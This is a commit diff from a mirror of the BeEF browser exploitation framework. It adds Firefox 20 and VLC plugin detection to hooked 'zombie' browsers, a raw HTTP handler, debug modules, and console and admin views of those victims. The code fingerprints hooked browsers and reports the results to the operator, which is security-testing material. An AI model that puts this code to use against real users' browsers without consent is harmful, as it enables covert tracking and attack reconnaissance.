Hiddenden/beef
2
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Merge branch 'master' of https://github.com/beefproject/beef

Browse Source
This commit is contained in:
antisnatchor
2013-03-03 11:26:29 +00:00
parent b4d690a5f3 58fb939b96
commit 710769283e
23 changed files with 362 additions and 125 deletions
Download Patch File Download Diff File Expand all files Collapse all files

1
.gitignore vendored
View File

@@ -3,3 +3,4 @@ test/msf-test
custom-config.yaml
.DS_Store
.gitignore
.rvmrc

2
VERSION
View File

@@ -4,4 +4,4 @@
# See the file 'doc/COPYING' for copying permission
#
0.4.4.2-alpha
0.4.4.3-alpha

2
config.yaml
View File

@@ -6,7 +6,7 @@
# BeEF Configuration file
beef:
version: '0.4.4.2-alpha'
version: '0.4.4.3-alpha'
debug: false
restrictions:

1
core/bootstrap.rb
View File

@@ -25,6 +25,7 @@ require 'core/main/handlers/browserdetails'
# @note Include the network stack
require 'core/main/network_stack/handlers/dynamicreconstruction'
require 'core/main/network_stack/handlers/redirector'
require 'core/main/network_stack/handlers/raw'
require 'core/main/network_stack/assethandler'
require 'core/main/network_stack/api'

55
core/main/client/browser.js
View File

@@ -225,15 +225,23 @@ beef.browser = {
* @example: beef.browser.isFF19()
*/
isFF19:function () {
return !!window.devicePixelRatio && !!window.history.replaceState && window.navigator.userAgent.match(/Firefox\/19\./) != null;
return !!window.devicePixelRatio && !!window.history.replaceState && typeof navigator.mozGetUserMedia != "undefined" && window.navigator.userAgent.match(/Firefox\/19\./) != null;
},
/**
* Returns true if FF20
* @example: beef.browser.isFF20()
*/
isFF20:function () {
return !!window.devicePixelRatio && !!window.history.replaceState && typeof navigator.mozGetUserMedia != "undefined" && window.navigator.userAgent.match(/Firefox\/20\./) != null;
},
/**
* Returns true if FF.
* @example: beef.browser.isFF()
*/
isFF:function () {
return this.isFF2() || this.isFF3() || this.isFF3_5() || this.isFF3_6() || this.isFF4() || this.isFF5() || this.isFF6() || this.isFF7() || this.isFF8() || this.isFF9() || this.isFF10() || this.isFF11() || this.isFF12() || this.isFF13() || this.isFF14() || this.isFF15() || this.isFF16() || this.isFF17() || this.isFF18() || this.isFF19();
return this.isFF2() || this.isFF3() || this.isFF3_5() || this.isFF3_6() || this.isFF4() || this.isFF5() || this.isFF6() || this.isFF7() || this.isFF8() || this.isFF9() || this.isFF10() || this.isFF11() || this.isFF12() || this.isFF13() || this.isFF14() || this.isFF15() || this.isFF16() || this.isFF17() || this.isFF18() || this.isFF19() || this.isFF20();
},
/**
@@ -544,6 +552,7 @@ beef.browser = {
FF17:this.isFF17(), // Firefox 17
FF18:this.isFF18(), // Firefox 18
FF19:this.isFF19(), // Firefox 19
FF20:this.isFF20(), // Firefox 20
FF:this.isFF(), // Firefox any version
IE6:this.isIE6(), // Internet Explorer 6
@@ -739,6 +748,10 @@ beef.browser = {
return '19'
}
; // Firefox 19
if (this.isFF20()) {
return '20'
}
; // Firefox 20
if (this.isIE6()) {
return '6'
@@ -923,15 +936,15 @@ beef.browser = {
// Internet Explorer
} else {
var definedControls = [
'RealPlayer',
'rmocx.RealPlayer G2 Control',
'rmocx.RealPlayer G2 Control.1',
'RealPlayer.RealPlayer(tm) ActiveX Control (32-bit)',
'RealVideo.RealVideo(tm) ActiveX Control (32-bit)'
'RealVideo.RealVideo(tm) ActiveX Control (32-bit)'
];
for (var i = 0; i < definedControls.length; i++) {
try {
@@ -951,6 +964,28 @@ beef.browser = {
},
/**
* Checks if VLC is installed
* @return: {Boolean} true or false
**/
hasVLC:function() {
var vlc = false ;
if(!this.type().IE) {
for (i = 0; i < navigator.plugins.length; i++) {
if (navigator.plugins[i].name.indexOf("VLC") >= 0) {
vlc = true;
}
}
} else {
try {
control = new ActiveXObject("VideoLAN.VLCPlugin.2");
vlc = true ;
} catch(e) {
}
};
return vlc ;
},
/**
* Checks if the zombie has Java enabled.
* @return: {Boolean} true or false.
@@ -2138,8 +2173,9 @@ beef.browser = {
var has_web_socket = (beef.browser.hasWebSocket()) ? "Yes" : "No";
var has_activex = (beef.browser.hasActiveX()) ? "Yes" : "No";
var has_silverlight = (beef.browser.hasSilverlight()) ? "Yes" : "No";
var has_quicktime = (beef.browser.hasQuickTime()) ? "Yes" : "No";
var has_realplayer = (beef.browser.hasRealPlayer()) ? "Yes" : "No";
var has_quicktime = (beef.browser.hasQuickTime()) ? "Yes" : "No";
var has_realplayer = (beef.browser.hasRealPlayer()) ? "Yes" : "No";
var has_vlc = (beef.browser.hasVLC()) ? "Yes" : "No";
try{
var cookies = document.cookie;
var has_session_cookies = (beef.browser.cookie.hasSessionCookies("cookie")) ? "Yes" : "No";
@@ -2181,8 +2217,9 @@ beef.browser = {
if (has_googlegears) details['HasGoogleGears'] = has_googlegears
if (has_activex) details['HasActiveX'] = has_activex;
if (has_silverlight) details['HasSilverlight'] = has_silverlight;
if (has_quicktime) details['HasQuickTime'] = has_quicktime;
if (has_realplayer) details['HasRealPlayer'] = has_realplayer;
if (has_quicktime) details['HasQuickTime'] = has_quicktime;
if (has_realplayer) details['HasRealPlayer'] = has_realplayer;
if (has_vlc) details['HasVLC'] = has_vlc ;
return details;
},

10
core/main/handlers/browserdetails.rb
View File

@@ -270,7 +270,7 @@ module BeEF
else
self.err_msg "Invalid value for HasQuickTime returned from the hook browser's initial connection."
end
# get and store the yes|no value for HasRealPlayer
has_realplayer = get_param(@data['results'], 'HasRealPlayer')
if BeEF::Filters.is_valid_yes_no?(has_realplayer)
@@ -279,6 +279,14 @@ module BeEF
self.err_msg "Invalid value for HasRealPlayer returned from the hook browser's initial connection."
end
# get and store the yes|no value for HasVLC
has_vlc = get_param(@data['results'], 'HasVLC')
if BeEF::Filters.is_valid_yes_no?(has_vlc)
BD.set(session_id, 'HasVLC', has_vlc)
else
self.err_msg "Invalid value for HasVLC returned from the hook browser's initial connection."
end
# get and store the value for CPU
cpu_type = get_param(@data['results'], 'CPU')
if !cpu_type.nil?

18
core/main/network_stack/assethandler.rb
View File

@@ -38,6 +38,24 @@ module Handlers
url
end
# Binds raw HTTP to a mount point
# @param [Integer] status HTTP status code to return
# @param [String] headers HTTP headers as a JSON string to return
# @param [String] body HTTP body to return
# @param [String] path URL path to mount the asset to TODO (can be nil for random path)
# @todo @param [Integer] count The amount of times the asset can be accessed before being automatically unbinded (-1 = unlimited)
def bind_raw(status, header, body, path=nil, count=-1)
url = build_url(path,nil)
@allocations[url] = {}
@http_server.mount(
url,
BeEF::Core::NetworkStack::Handlers::Raw.new(status, header, body)
)
@http_server.remap
print_info "Raw HTTP bound to url [" + url + "]"
url
end
# Binds a file to a mount point
# @param [String] file File path to asset
# @param [String] path URL path to mount the asset to (can be nil for random path)

33
core/main/network_stack/handlers/raw.rb Normal file
View File

@@ -0,0 +1,33 @@
#
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
module BeEF
module Core
module NetworkStack
module Handlers
class Raw
def initialize(status, header={}, body)
@status = status
@header = header
@body = body
end
def call(env)
[@status, @header, @body]
end
private
@request
@response
end
end
end
end
end

109
extensions/admin_ui/controllers/modules/modules.rb
View File

@@ -7,14 +7,14 @@ module BeEF
module Extension
module AdminUI
module Controllers
#
#
#
class Modules < BeEF::Extension::AdminUI::HttpController
BD = BeEF::Core::Models::BrowserDetails
def initialize
super({
'paths' => {
@@ -31,7 +31,7 @@ class Modules < BeEF::Extension::AdminUI::HttpController
'/commandmodule/reexecute' => method(:reexecute_command_module)
}
})
@session = BeEF::Extension::AdminUI::Session.instance
end
@@ -45,11 +45,11 @@ class Modules < BeEF::Extension::AdminUI::HttpController
'token' => BeEF::Core::Configuration.instance.get("beef.api_token")
}.to_json
end
# Returns a JSON array containing the summary for a selected zombie.
def select_zombie_summary
# get the zombie
# get the zombie
zombie_session = @params['zombie_session'] || nil
(print_error "Zombie session is nil";return) if zombie_session.nil?
zombie = BeEF::Core::Models::HookedBrowser.first(:session => zombie_session)
@@ -57,7 +57,7 @@ class Modules < BeEF::Extension::AdminUI::HttpController
# init the summary grid
summary_grid_hash = {
'success' => 'true',
'success' => 'true',
'results' => []
}
@@ -83,6 +83,7 @@ class Modules < BeEF::Extension::AdminUI::HttpController
['Browser Components', 'Web Sockets', 'HasWebSocket'],
['Browser Components', 'QuickTime', 'HasQuickTime'],
['Browser Components', 'RealPlayer', 'HasRealPlayer'],
['Browser Components', 'VLC', 'HasVLC'],
['Browser Components', 'ActiveX', 'HasActiveX'],
['Browser Components', 'Session Cookies', 'hasSessionCookies'],
['Browser Components', 'Persistent Cookies', 'hasPersistentCookies'],
@@ -124,7 +125,7 @@ class Modules < BeEF::Extension::AdminUI::HttpController
height = window_size_hash['height']
data = "Width: #{width}, Height: #{height}"
else
data = BD.get(zombie_session, p[2])
data = BD.get(zombie_session, p[2])
end
# add property to summary hash
@@ -138,7 +139,7 @@ class Modules < BeEF::Extension::AdminUI::HttpController
end
@body = summary_grid_hash.to_json
@body = summary_grid_hash.to_json
end
# Returns the list of all command_modules in a JSON format
@@ -262,10 +263,10 @@ class Modules < BeEF::Extension::AdminUI::HttpController
#Recursive function to sort all the parent's children
def sort_recursive_tree(parent)
# sort the children nodes by status and name
parent.each {|x|
parent.each {|x|
#print_info "Sorting: " + x['children'].to_s
if x.is_a?(Hash) and x.has_key?('children')
x['children'] = x['children'].sort_by {|a|
x['children'] = x['children'].sort_by {|a|
fldr = a['cls'] ? a['cls'] : 'zzzzz'
"#{fldr}#{a['status']}#{a['text']}"
}
@@ -349,20 +350,20 @@ class Modules < BeEF::Extension::AdminUI::HttpController
update_command_module_tree(tree, dyn_mod_category, command_module_icon_path, command_module_status, command_mod_name,dyn_mod.id)
}
end
# sort the parent array nodes
# sort the parent array nodes
tree.sort! {|a,b| a['text'] <=> b['text']}
sort_recursive_tree(tree)
retitle_recursive_tree(tree)
# return a JSON array of hashes
@body = tree.to_json
end
# Returns the inputs definition of an command_module.
def select_command_module
command_module_id = @params['command_module_id'] || nil
@@ -377,7 +378,7 @@ class Modules < BeEF::Extension::AdminUI::HttpController
@body = command_modules2json([key])
end
end
# Returns the list of commands for an command_module
def select_command_module_commands
commands = []
@@ -392,32 +393,32 @@ class Modules < BeEF::Extension::AdminUI::HttpController
nonce = @params['nonce'] || nil
(print_error "nonce is nil";return) if nonce.nil?
(print_error "nonce incorrect";return) if @session.get_nonce != nonce
# get the browser id
zombie = Z.first(:session => zombie_session)
(print_error "Zombie is nil";return) if zombie.nil?
zombie_id = zombie.id
(print_error "Zombie id is nil";return) if zombie_id.nil?
C.all(:command_module_id => command_module_id, :hooked_browser_id => zombie_id).each do |command|
commands.push({
'id' => i,
'object_id' => command.id,
'creationdate' => Time.at(command.creationdate.to_i).strftime("%Y-%m-%d %H:%M").to_s,
'id' => i,
'object_id' => command.id,
'creationdate' => Time.at(command.creationdate.to_i).strftime("%Y-%m-%d %H:%M").to_s,
'label' => command.label
})
i+=1
end
@body = {
'success' => 'true',
'success' => 'true',
'commands' => commands}.to_json
end
# Attaches an command_module to a zombie.
def attach_command_module
definition = {}
# get params
@@ -429,8 +430,8 @@ class Modules < BeEF::Extension::AdminUI::HttpController
nonce = @params['nonce'] || nil
(print_error "nonce is nil";return) if nonce.nil?
(print_error "nonce incorrect";return) if @session.get_nonce != nonce
@params.keys.each {|param|
@params.keys.each {|param|
(print_error "invalid key param string";return) if not BeEF::Filters.has_valid_param_chars?(param)
(print_error "first char is num";return) if BeEF::Filters.first_char_is_num?(param)
definition[param[4..-1]] = params[param]
@@ -449,10 +450,10 @@ class Modules < BeEF::Extension::AdminUI::HttpController
exec_results = BeEF::Module.execute(mod_key, zombie_session, def2)
@body = (exec_results != nil) ? '{success: true}' : '{success: false}'
end
# Re-execute an command_module to a zombie.
def reexecute_command_module
# get params
command_id = @params['command_id'] || nil
(print_error "Command id is nil";return) if command_id.nil?
@@ -462,15 +463,15 @@ class Modules < BeEF::Extension::AdminUI::HttpController
nonce = @params['nonce'] || nil
(print_error "nonce is nil";return) if nonce.nil?
(print_error "nonce incorrect";return) if @session.get_nonce != nonce
command.instructions_sent = false
command.save
@body = '{success : true}'
end
def attach_dynamic_command_module
definition = {}
# get params
@@ -482,8 +483,8 @@ class Modules < BeEF::Extension::AdminUI::HttpController
nonce = @params['nonce'] || nil
(print_error "nonce is nil";return) if nonce.nil?
(print_error "nonce incorrect";return) if @session.get_nonce != nonce
@params.keys.each {|param|
@params.keys.each {|param|
(print_error "invalid key param string";return) if not BeEF::Filters.has_valid_param_chars?(param)
(print_error "first char is num";return) if BeEF::Filters.first_char_is_num?(param)
definition[param[4..-1]] = params[param]
@@ -525,11 +526,11 @@ class Modules < BeEF::Extension::AdminUI::HttpController
end
# Returns the results of a command
def select_command_results
results = []
# get params
command_id = @params['command_id']|| nil
(print_error "Command id is nil";return) if command_id.nil?
@@ -539,24 +540,24 @@ class Modules < BeEF::Extension::AdminUI::HttpController
# get command_module
command_module = BeEF::Core::Models::CommandModule.first(:id => command.command_module_id)
(print_error "command_module is nil";return) if command_module.nil?
resultsdb = BeEF::Core::Models::Result.all(:command_id => command_id)
(print_error "Command id result is nil";return) if resultsdb.nil?
resultsdb.each{ |result| results.push({'date' => result.date, 'data' => JSON.parse(result.data)}) }
@body = {
'success' => 'true',
'success' => 'true',
'command_module_name' => command_module.name,
'command_module_id' => command_module.id,
'results' => results}.to_json
end
# Returns the definition of a command.
# In other words it returns the command that was used to command_module a zombie.
def select_command
# get params
command_id = @params['command_id'] || nil
(print_error "Command id is nil";return) if command_id.nil?
@@ -573,9 +574,9 @@ class Modules < BeEF::Extension::AdminUI::HttpController
command_module_name = command_module.name
e = BeEF::Core::Command.const_get(command_module_name.capitalize).new(command_module_name)
end
@body = {
'success' => 'true',
'success' => 'true',
'command_module_name' => command_module_name,
'command_module_id' => command_module.id,
'data' => BeEF::Module.get_options(command_module_name),
@@ -583,9 +584,9 @@ class Modules < BeEF::Extension::AdminUI::HttpController
}.to_json
end
private
# Takes a list of command_modules and returns them as a JSON array
def command_modules2json(command_modules)
command_modules_json = {}
@@ -601,7 +602,7 @@ class Modules < BeEF::Extension::AdminUI::HttpController
command_modules_json[i] = h
i += 1
end
if not command_modules_json.empty?
return {'success' => 'true', 'command_modules' => command_modules_json}.to_json
else
@@ -612,15 +613,15 @@ class Modules < BeEF::Extension::AdminUI::HttpController
# return the input requred for the module in JSON format
def dynamic_modules2json(id)
command_modules_json = {}
mod = BeEF::Core::Models::CommandModule.first(:id => id)
# if the module id is not in the database return false
return {'success' => 'false'}.to_json if(not mod)
# the path will equal Dynamic/<type> and this will get just the type
dynamic_type = mod.path.split("/").last
e = BeEF::Modules::Commands.const_get(dynamic_type.capitalize).new
e.update_info(mod.id)
e.update_data()
@@ -647,7 +648,7 @@ class Modules < BeEF::Extension::AdminUI::HttpController
return {'success' => 'true', 'command_modules' => payload_options_json}.to_json
end
end
end

10
extensions/admin_ui/controllers/panel/panel.rb
View File

@@ -90,8 +90,9 @@ module BeEF
has_java = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'JavaEnabled')
has_activex = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'HasActiveX')
has_silverlight = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'HasSilverlight')
has_quicktime = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'HasQuickTime')
has_realplayer = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'HasRealPlayer')
has_quicktime = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'HasQuickTime')
has_realplayer = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'HasRealPlayer')
has_vlc = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'HasVLC')
date_stamp = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'DateStamp')
return {
@@ -112,8 +113,9 @@ module BeEF
'has_java' => has_java,
'has_activex' => has_activex,
'has_silverlight' => has_silverlight,
'has_quicktime' => has_quicktime,
'has_realplayer' => has_realplayer,
'has_quicktime' => has_quicktime,
'has_vlc' => has_vlc,
'has_realplayer' => has_realplayer,
'date_stamp' => date_stamp
}

32
extensions/admin_ui/media/javascript/ui/panel/ZombiesMgr.js
View File

@@ -5,10 +5,10 @@
//
var ZombiesMgr = function(zombies_tree_lists) {
//save the list of trees in the object
this.zombies_tree_lists = zombies_tree_lists;
// this is a helper class to create a zombie object from a JSON hash index
this.zombieFactory = function(index, zombie_array){
@@ -26,8 +26,9 @@ var ZombiesMgr = function(zombies_tree_lists) {
var has_flash = zombie_array[index]["has_flash"];
var has_web_sockets = zombie_array[index]["has_web_sockets"];
var has_googlegears = zombie_array[index]["has_googlegears"];
var has_java = zombie_array[index]["has_java"];
var has_java = zombie_array[index]["has_java"];
var has_activex = zombie_array[index]["has_activex"];
var has_vlc = zombie_array[index]["has_vlc"];
var has_silverlight = zombie_array[index]["has_silverlight"];
var has_quicktime = zombie_array[index]["has_quicktime"];
var has_realplayer = zombie_array[index]["has_realplayer"];
@@ -44,15 +45,16 @@ var ZombiesMgr = function(zombies_tree_lists) {
balloon_text+= "<br/>Hardware: " + hw_name;
balloon_text+= "<br/>Domain: " + domain + ":" + port;
balloon_text+= "<br/>Flash: " + has_flash;
balloon_text+= "<br/>Java: " + has_java;
balloon_text+= "<br/>Web Sockets: " + has_web_sockets;
balloon_text+= "<br/>Java: " + has_java;
balloon_text+= "<br/>Web Sockets: " + has_web_sockets;
balloon_text+= "<br/>ActiveX: " + has_activex;
balloon_text+= "<br/>Silverlight: " + has_silverlight;
balloon_text+= "<br/>QuickTime: " + has_quicktime;
balloon_text+= "<br/>VLC: " + has_vlc;
balloon_text+= "<br/>RealPlayer: " + has_realplayer;
balloon_text+= "<br/>Google Gears: " + has_googlegears;
balloon_text+= "<br/>Date: " + date_stamp;
var new_zombie = {
'id' : index,
'ip' : ip,
@@ -63,10 +65,10 @@ var ZombiesMgr = function(zombies_tree_lists) {
'domain' : domain,
'port' : port
};
return new_zombie;
}
/*
* Update the hooked browser trees
* @param: {Literal Object} an object containing the list of offline and online hooked browsers.
@@ -75,33 +77,33 @@ var ZombiesMgr = function(zombies_tree_lists) {
this.updateZombies = function(zombies, rules){
var offline_hooked_browsers = zombies["offline"];
var online_hooked_browsers = zombies["online"];
for(tree_type in this.zombies_tree_lists) {
hooked_browsers_tree = this.zombies_tree_lists[tree_type];
//we compare and remove the hooked browsers from online and offline branches for each tree.
hooked_browsers_tree.compareAndRemove(zombies);
//add an offline browser to the tree
for(var i in offline_hooked_browsers) {
var offline_hooked_browser = this.zombieFactory(i, offline_hooked_browsers);
hooked_browsers_tree.addZombie(offline_hooked_browser, false, ((tree_type != 'basic') ? true : false));
}
//add an online browser to the tree
for(var i in online_hooked_browsers) {
var online_hooked_browser = this.zombieFactory(i, online_hooked_browsers);
hooked_browsers_tree.addZombie(online_hooked_browser, true, ((tree_type != 'basic') ? true : false));
}
//apply the rules to the tree
hooked_browsers_tree.applyRules(rules);
//expand the online hooked browser tree lists
if(hooked_browsers_tree.online_hooked_browsers_treenode.childNodes.length > 0) {
hooked_browsers_tree.online_hooked_browsers_treenode.expand(true);
}
//expand the offline hooked browser tree lists
if(hooked_browsers_tree.offline_hooked_browsers_treenode.childNodes.length > 0) {
hooked_browsers_tree.offline_hooked_browsers_treenode.expand(true);

5
extensions/console/lib/command_dispatcher/core.rb
View File

@@ -142,11 +142,12 @@ class Core
'Id',
'IP',
'Browser',
'OS'
'OS',
'Hardware'
])
BeEF::Core::Models::HookedBrowser.all(:lastseen.gte => (Time.new.to_i - 30)).each do |zombie|
tbl << [zombie.id,zombie.ip,BeEF::Core::Models::BrowserDetails.get(zombie.session, 'BrowserName')+"-"+BeEF::Core::Models::BrowserDetails.get(zombie.session, 'BrowserVersion'),BeEF::Core::Models::BrowserDetails.get(zombie.session, 'OsName')]
tbl << [zombie.id,zombie.ip,BeEF::Core::Models::BrowserDetails.get(zombie.session, 'BrowserName')+"-"+BeEF::Core::Models::BrowserDetails.get(zombie.session, 'BrowserVersion'),BeEF::Core::Models::BrowserDetails.get(zombie.session, 'OsName'),BeEF::Core::Models::BrowserDetails.get(zombie.session, 'Hardware')]
end
puts "\n"

75
extensions/console/lib/shellinterface.rb
View File

@@ -8,14 +8,14 @@ module Extension
module Console
class ShellInterface
BD = BeEF::Core::Models::BrowserDetails
def initialize(config)
self.config = config
self.cmd = {}
end
def settarget(id)
begin
self.targetsession = BeEF::Core::Models::HookedBrowser.first(:id => id).session
@@ -25,7 +25,7 @@ class ShellInterface
return nil
end
end
def setofflinetarget(id)
begin
self.targetsession = BeEF::Core::Models::HookedBrowser.first(:id => id).session
@@ -35,7 +35,7 @@ class ShellInterface
return nil
end
end
def cleartarget
self.targetsession = nil
self.targetip = nil
@@ -45,9 +45,9 @@ class ShellInterface
# @note Get commands. This is a *modified* replica of select_command_modules_tree from extensions/admin_ui/controllers/modules/modules.rb
def getcommands
return if self.targetid.nil?
tree = []
BeEF::Modules.get_categories.each { |c|
if c[-1,1] != "/"
@@ -104,39 +104,39 @@ class ShellInterface
update_command_module_tree(tree, dyn_mod_category, "Verified Unknown", command_mod_name,dyn_mod.id)
}
end
# sort the parent array nodes
# sort the parent array nodes
tree.sort! {|a,b| a['text'] <=> b['text']}
# sort the children nodes by status
tree.each {|x| x['children'] =
x['children'].sort_by {|a| a['status']}
}
# append the number of command modules so the branch name results in: "<category name> (num)"
#tree.each {|command_module_branch|
# num_of_command_modules = command_module_branch['children'].length
# command_module_branch['text'] = command_module_branch['text'] + " (" + num_of_command_modules.to_s() + ")"
#}
# return a JSON array of hashes
tree
end
def setcommand(id)
key = BeEF::Module.get_key_by_database_id(id.to_i)
self.cmd['id'] = id
self.cmd['Name'] = self.config.get("beef.module.#{key}.name")
self.cmd['Description'] = self.config.get("beef.module.#{key}.description")
self.cmd['Category'] = self.config.get("beef.module.#{key}.category")
self.cmd['Data'] = BeEF::Module.get_options(key)
end
def clearcommand
self.cmd = {}
end
def setparam(param,value)
self.cmd['Data'].each do |data|
if data['name'] == param
@@ -145,12 +145,12 @@ class ShellInterface
end
end
end
def getcommandresponses(cmdid = self.cmd['id'])
commands = []
i = 0
BeEF::Core::Models::Command.all(:command_module_id => cmdid, :hooked_browser_id => self.targetid).each do |command|
commands.push({
'id' => i,
@@ -160,10 +160,10 @@ class ShellInterface
})
i+=1
end
commands
end
def getindividualresponse(cmdid)
results = []
begin
@@ -175,26 +175,26 @@ class ShellInterface
end
results
end
def executecommand
definition = {}
options = {}
options.store("zombie_session", self.targetsession.to_s)
options.store("command_module_id", self.cmd['id'])
if not self.cmd['Data'].nil?
self.cmd['Data'].each do |key|
options.store("txt_"+key['name'].to_s,key['value'])
end
end
options.keys.each {|param|
options.keys.each {|param|
definition[param[4..-1]] = options[param]
oc = BeEF::Core::Models::OptionCache.first_or_create(:name => param[4..-1])
oc.value = options[param]
oc.save
}
mod_key = BeEF::Module.get_key_by_database_id(self.cmd['id'])
# Hack to rework the old option system into the new option system
def2 = []
@@ -207,7 +207,7 @@ class ShellInterface
else
return false
end
#Old method
#begin
# BeEF::Core::Models::Command.new( :data => definition.to_json,
@@ -218,10 +218,10 @@ class ShellInterface
#rescue
# return false
#end
#return true
end
def update_command_module_tree(tree, cmd_category, cmd_status, cmd_name, cmd_id)
# construct leaf node for the command module tree
@@ -240,7 +240,7 @@ class ShellInterface
end
}
end
def get_command_module_status(mod)
hook_session_id = self.targetsession
if hook_session_id == nil
@@ -250,7 +250,7 @@ class ShellInterface
'browser' => BD.get(hook_session_id, 'BrowserName'),
'ver' => BD.get(hook_session_id, 'BrowserVersion'),
'os' => [BD.get(hook_session_id, 'OsName')]})
when BeEF::Core::Constants::CommandModule::VERIFIED_NOT_WORKING
return "Verified Not Working"
when BeEF::Core::Constants::CommandModule::VERIFIED_USER_NOTIFY
@@ -268,12 +268,12 @@ class ShellInterface
# Yoinked from the UI panel -
# we really need to centralise all this stuff and encapsulate it away.
def select_zombie_summary
return if self.targetsession.nil?
# init the summary grid
summary_grid_hash = {
'success' => 'true',
'success' => 'true',
'results' => []
}
@@ -299,6 +299,7 @@ class ShellInterface
['Browser Components', 'Web Sockets', 'HasWebSocket'],
['Browser Components', 'QuickTime', 'HasQuickTime'],
['Browser Components', 'RealPlayer', 'HasRealPlayer'],
['Browser Components', 'VLC', 'HasVLC'],
['Browser Components', 'ActiveX', 'HasActiveX'],
['Browser Components', 'Session Cookies', 'hasSessionCookies'],
['Browser Components', 'Persistent Cookies', 'hasPersistentCookies'],
@@ -340,7 +341,7 @@ class ShellInterface
height = window_size_hash['height']
data = "Width: #{width}, Height: #{height}"
else
data = BD.get(zombie_session, p[2])
data = BD.get(zombie_session, p[2])
end
# add property to summary hash
@@ -356,14 +357,14 @@ class ShellInterface
summary_grid_hash
end
attr_reader :targetsession
attr_reader :targetid
attr_reader :targetip
attr_reader :cmd
protected
attr_writer :targetsession
attr_writer :targetid
attr_writer :targetip

1
modules/browser/detect_toolbars/config.yaml
View File

@@ -13,4 +13,3 @@ beef:
authors: ["gcattani"]
target:
working: ["All"]
not_working: ["None"]

14
modules/browser/detect_vlc/command.js Normal file
View File

@@ -0,0 +1,14 @@
//
// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
beef.execute(function() {
var result = ( beef.browser.hasVLC() )? "Yes" : "No";
beef.net.send("<%= @command_url %>", <%= @command_id %>, "vlc="+result);
});

15
modules/browser/detect_vlc/config.yaml Normal file
View File

@@ -0,0 +1,15 @@
#
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
beef:
module:
detect_vlc:
enable: true
category: "Browser"
name: "Detect VLC"
description: "This module will check if the browser has VLC plugin."
authors: ["nbblrr"]
target:
working: ["IE", "FF", "C"]

14
modules/browser/detect_vlc/module.rb Normal file
View File

@@ -0,0 +1,14 @@
#
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
class Detect_vlc < BeEF::Core::Command
def post_execute
content = {}
content['vlc'] = @datastore['vlc']
save content
end
end

11
modules/debug/test_http_bind_raw/command.js Normal file
View File

@@ -0,0 +1,11 @@
//
// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
beef.execute(function() {
beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=mounted to /beef');
});

15
modules/debug/test_http_bind_raw/config.yaml Normal file
View File

@@ -0,0 +1,15 @@
#
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
beef:
module:
test_http_bind_raw:
enable: true
category: "Debug"
name: "Test HTTP Bind Raw"
description: "Test the HTTP 'bind_raw' handler."
authors: ["bcoles"]
target:
working: ["All"]

20
modules/debug/test_http_bind_raw/module.rb Normal file
View File

@@ -0,0 +1,20 @@
#
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
class Test_http_bind_raw < BeEF::Core::Command
def pre_send
configuration = BeEF::Core::Configuration.instance
xss_hook_url = "http://#{configuration.get("beef.http.host")}:#{configuration.get("beef.http.port")}/demos/basic.html"
BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind_raw('200', {'Content-Type'=>'text/html','beef'=>xss_hook_url}, 'hello world!', '/beef', -1)
end
def post_execute
content = {}
content['Result'] = @datastore['result']
save content
end
end

11
modules/debug/test_http_redirect/command.js Normal file
View File

@@ -0,0 +1,11 @@
//
// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
beef.execute(function() {
beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=mounted to /redirect');
});

15
modules/debug/test_http_redirect/config.yaml Normal file
View File

@@ -0,0 +1,15 @@
#
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
beef:
module:
test_http_redirect:
enable: true
category: "Debug"
name: "Test HTTP Redirect"
description: "Test the HTTP 'redirect' handler."
authors: ["bcoles"]
target:
working: ["All"]

18
modules/debug/test_http_redirect/module.rb Normal file
View File

@@ -0,0 +1,18 @@
#
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
class Test_http_redirect < BeEF::Core::Command
def pre_send
BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind_redirect('http://beefproject.com', '/redirect')
end
def post_execute
content = {}
content['Result'] = @datastore['result']
save content
end
end